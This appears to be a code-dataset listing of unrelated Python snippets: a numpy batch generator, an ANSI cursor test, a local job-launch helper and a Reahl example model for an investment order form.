batch_idx = np.asarray(batch_idx)
else:
batch_idx = np.arange(len(dataset))
if drop_last:
steps_per_epoch = (len(dataset) // batch_size)
batch_idx = batch_idx[:(steps_per_epoch * batch_size)]
batch_idx = batch_idx.reshape((steps_per_epoch, batch_size))
else:
steps_per_epoch = math.ceil((len(dataset) / batch_size))
batch_idx = np.array_split(batch_idx, steps_per_epoch)
for idx in batch_idx:
batch = dataset[idx]
batch = {k: np.array(v) for (k, v) in batch.items()}
(yield batch) |
def test_cursor():
count = 1
assert (ansi.Cursor.UP(count) == f'{ansi.CSI}{count}A')
assert (ansi.Cursor.DOWN(count) == f'{ansi.CSI}{count}B')
assert (ansi.Cursor.FORWARD(count) == f'{ansi.CSI}{count}C')
assert (ansi.Cursor.BACK(count) == f'{ansi.CSI}{count}D')
x = 4
y = 5
assert (ansi.Cursor.SET_POS(x, y) == f'{ansi.CSI}{y};{x}H') |
def run_job_locally(job_command, log_path, args, no_launch=False, log_file_prefix=''):
cmd_file = os.path.join(log_path, (log_file_prefix + 'launch.sh'))
with open(cmd_file, 'w') as out_f:
if args.conda_env:
print(f'source activate {args.conda_env}', file=out_f)
echo_system_info(out_f)
set_num_cpu_threads(out_f, args.num_cpus)
print(job_command, file=out_f)
echo_system_info(out_f)
stdout_file_path = os.path.join(log_path, (log_file_prefix + args.stdout_file))
stderr_file_path = os.path.join(log_path, (log_file_prefix + args.stderr_file))
cmd = f'bash {cmd_file} 2>{stderr_file_path} | tee -a {stdout_file_path}'
run_cmd_with_line_printing(cmd, no_launch=no_launch) |
_scoped
class InvestmentOrder(Base):
__tablename__ = 'rspnsv_disc_investment_order'
id = Column(Integer, primary_key=True)
agreed_to_terms = Column(Boolean)
new_or_existing = Column(UnicodeText)
existing_account_number = Column(Integer)
name = Column(UnicodeText)
surname = Column(UnicodeText)
amount = Column(Integer)
amount_or_percentage = Column(UnicodeText)
allocations = relationship('reahl.doc.examples.howtos.responsivedisclosure.responsivedisclosure.Allocation', back_populates='investment_order', lazy='immediate', cascade='all, delete-orphan')
id_document = relationship('reahl.doc.examples.howtos.responsivedisclosure.responsivedisclosure.IDDocument', uselist=False, back_populates='investment_order', cascade='all, delete-orphan')
fields = ExposedNames()
fields.agreed_to_terms = (lambda i: BooleanField(label='I agree to the terms and conditions'))
fields.new_or_existing = (lambda i: ChoiceField([Choice('new', Field(label='New')), Choice('existing', Field(label='Existing'))], label='Are you a new or existing investor?'))
fields.existing_account_number = (lambda i: IntegerField(label='Existing account number', required=True))
fields.name = (lambda i: Field(label='Name', required=True))
fields.surname = (lambda i: Field(label='Surname', required=True))
fields.amount = (lambda i: IntegerField(label='Total amount', required=True))
fields.amount_or_percentage = (lambda i: ChoiceField([Choice('amount', Field(label='Amount')), Choice('percentage', Field(label='Percentage'))], label='Allocate using', required=True))
events = ExposedNames()
events.submit = (lambda i: Event(label='Submit', action=Action(i.submit)))
events.allocation_changed = (lambda i: Event(action=Action(i.recalculate)))
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.clear()
def clear(self):
self.amount_or_percentage = 'percentage'
self.name = None
self.surname = None
self.amount = 0
self.existing_account_number = None
self.new_or_existing = None
self.agreed_to_terms = False
self.allocations = [Allocation(self, 'Fund A'), Allocation(self, 'Fund B')]
self.id_document = IDDocument(investment_order=self)
def is_in_percentage(self):
return (self.amount_or_percentage == 'percentage')
def recalculate(self):
for allocation in self.allocations:
allocation.recalculate(self.amount)
def total_allocation_amount(self):
return sum([i.amount for i in self.allocations])
def total_allocation_percentage(self):
return sum([i.percentage for i in self.allocations])
def validate_allocations(self):
if self.is_in_percentage:
if (self.total_allocation_percentage != 100):
raise DomainException(message='Please ensure allocation percentages add up to 100')
elif (self.total_allocation_amount != self.amount):
raise DomainException(message=('Please ensure allocation amounts add up to your total amount (%s)' % self.amount))
def submit(self):
print('Submitting investment')
self.recalculate()
self.validate_allocations()
if (self.new_or_existing == 'new'):
print(('\tName: %s' % self.name))
print(('\tSurname: %s' % self.surname))
print(('\t%s' % str(self.id_document)))
else:
print(('\tExisting account number: %s' % self.existing_account_number))
print(('\tAgreed to terms: %s' % self.agreed_to_terms))
print(('\tAmount: %s' % self.amount))
print(('\tAllocations (%s)' % self.amount_or_percentage))
for allocation in self.allocations:
allocation_size = (allocation.percentage if self.is_in_percentage else allocation.amount)
print(('\t\tFund %s(%s): %s (%s)' % (allocation.fund, allocation.fund_code, allocation_size, allocation.amount)))
self.clear() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.